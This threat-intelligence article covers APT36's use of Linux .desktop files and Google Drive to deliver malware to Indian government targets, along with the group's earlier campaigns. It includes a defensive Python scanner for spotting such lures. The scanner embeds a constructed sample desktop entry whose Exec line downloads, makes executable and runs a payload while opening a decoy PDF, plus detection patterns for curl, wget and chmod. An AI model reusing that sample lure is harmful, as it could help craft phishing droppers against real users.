In recent developments, the Pakistani state-sponsored hacking group known as APT36 has escalated its cyberespionage activities targeting Indian government and defense sectors. Active since at least 2013, APT36—also referred to as Earth Karkaddan, Mythic Leopard, Operation C-Major, and Transparent Tribe—has a history of conducting cyber operations against Indian entities.
Evolution of Attack Techniques
In August 2025, APT36 introduced a novel infection method that uses Linux desktop entry (.desktop) files to deliver malware. These files, plain-text configuration files that define application shortcuts and launchers, were distributed through procurement-themed phishing campaigns. The malicious .desktop files were embedded within ZIP archives and masqueraded as legitimate documents. When opened, they retrieved a dropper from Google Drive and simultaneously displayed a decoy PDF file in the Firefox browser so the victim saw the expected document.
The dropper performs anti-debugging and anti-sandbox checks, establishes persistence on the infected system, and initiates communication with the command-and-control (C&C) server over WebSockets. Incorporating Google Drive into the attack lifecycle marks a notable advance in APT36's tradecraft, introducing a spear-phishing vector that puts Linux-based government and defense infrastructure at heightened risk.
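A defender can triage this lure before it reaches a desktop: a .desktop file is an INI-style text file, so an archive scanner can flag entries whose Exec key spawns an inline shell, fetches content from Google Drive, or carries a document-like Name. The following is an added example written for this article (not tooling from any vendor cited here); the sample entry, file id and archive contents are constructed stand-ins, not indicators from the campaign.

```python
import configparser
import io
import re
import zipfile

# Heuristics for an XDG desktop entry that behaves like a dropper rather than a launcher.
SHELL_EXEC = re.compile(r"^(?:\S*/)?(sh|bash|dash|zsh)\s+(?:-\S+\s+)*-c\b")
STAGING = re.compile(r"\b(curl|wget|chmod)\b")
GDRIVE = re.compile(r"https?://(drive|docs)\.google\.com/", re.IGNORECASE)
DOC_NAME = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)$", re.IGNORECASE)
# Constructed sample shaped like the lure described above; the file id is a placeholder.
SUSPICIOUS = (
    "[Desktop Entry]\nType=Application\nName=Tender_Notice.pdf\nIcon=application-pdf\n"
    'Exec=bash -c "curl -sL https://drive.google.com/uc?export=download&id=PLACEHOLDER '
    '-o /tmp/.u; chmod +x /tmp/.u; /tmp/.u & firefox /tmp/decoy.pdf"\nTerminal=false\n'
)

def analyze_desktop_entry(text: str) -> list[str]:
    """Return findings for one .desktop file; an empty list means nothing looked odd."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(text)
    except configparser.Error:
        return ["not parseable as a desktop entry"]
    entry = cp["Desktop Entry"] if cp.has_section("Desktop Entry") else {}
    exec_line, name = entry.get("Exec", ""), entry.get("Name", "")
    findings = []
    if SHELL_EXEC.match(exec_line):
        findings.append("Exec spawns a shell with an inline command")
    if STAGING.search(exec_line):
        findings.append("Exec downloads or re-permissions files at launch (curl/wget/chmod)")
    if GDRIVE.search(exec_line):
        findings.append("Exec references Google Drive")
    if DOC_NAME.search(name):
        findings.append(f"Name '{name}' imitates a document")
    return findings

def scan_zip(data: bytes) -> dict[str, list[str]]:
    """Analyze every .desktop member of a ZIP held in memory (the delivery vehicle)."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return {m: analyze_desktop_entry(zf.read(m).decode("utf-8", "replace"))
                for m in zf.namelist() if m.lower().endswith(".desktop")}

def build_sample_zip() -> bytes:
    """Constructed archive: the .desktop lure beside a decoy PDF, as in the phishing mails."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Tender_Notice.pdf.desktop", SUSPICIOUS)
        zf.writestr("Tender_Notice.pdf", b"%PDF-1.4 constructed placeholder")
    return buf.getvalue()
```

The same checks can be applied to files already on disk under ~/.local/share/applications or ~/.config/autostart, where a dropper that persists through a desktop entry would leave a copy.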
Historical Context and Previous Campaigns
APT36 has a documented history of targeting Indian government entities through various sophisticated campaigns:
– Operation Celestial Force: Active since at least 2018, this campaign employed both Android and Windows malware to target individuals in the Indian defense, government, and related technology sectors. The threat actor, tracked as Cosmic Leopard, exhibited overlaps in tactics, techniques, tooling, and victimology with Transparent Tribe, a known Pakistan-linked state-sponsored group. The operation’s longevity and evolving malware suite indicate a high degree of success in targeting users in the Indian subcontinent.
– Operation C-Major: Uncovered by Trend Micro, this campaign involved attackers believed to be from Pakistan targeting Indian military personnel through social engineering and unsophisticated malware. The operation resulted in the theft of information from at least 160 military officers, including copies of passports, financial information, strategic documents, and personal photographs. The attacks began with bogus emails purporting to come from organizations such as India’s Ministry of Defense, designed to trick recipients into opening malicious attachments.
– Operation Transparent Tribe: Detailed by Proofpoint, this campaign involved an APT group believed to be based in Pakistan targeting Indian government and military personnel using spear-phishing emails and watering hole attacks. The attackers registered fake domains and used them to send emails referencing the Indian government’s 7th Central Pay Commission, with attachments exploiting vulnerabilities to deliver remote access Trojans (RATs).
Implications and Recommendations
The continuous evolution of APT36's attack vectors underscores the persistent cyber threat faced by Indian government and defense entities. The group's ability to adapt and employ sophisticated techniques, such as abusing a legitimate cloud service like Google Drive to host and deliver malware, highlights the need for stronger defensive measures.
To mitigate such threats, organizations should consider the following actions:
1. Employee Training: Conduct regular cybersecurity awareness programs to educate staff about phishing tactics and the importance of scrutinizing unsolicited emails and attachments.
2. System Hardening: Implement robust security configurations for Linux systems, including disabling unnecessary services and applying the principle of least privilege.
3. Regular Updates: Ensure all systems and software are up-to-date with the latest security patches to protect against known vulnerabilities.
4. Network Monitoring: Deploy advanced intrusion detection and prevention systems to monitor network traffic for signs of malicious activity.
5. Incident Response Planning: Develop and regularly update incident response plans to ensure swift action in the event of a security breach.
By adopting a comprehensive cybersecurity strategy that includes these measures, Indian government and defense entities can enhance their resilience against the evolving threats posed by groups like APT36.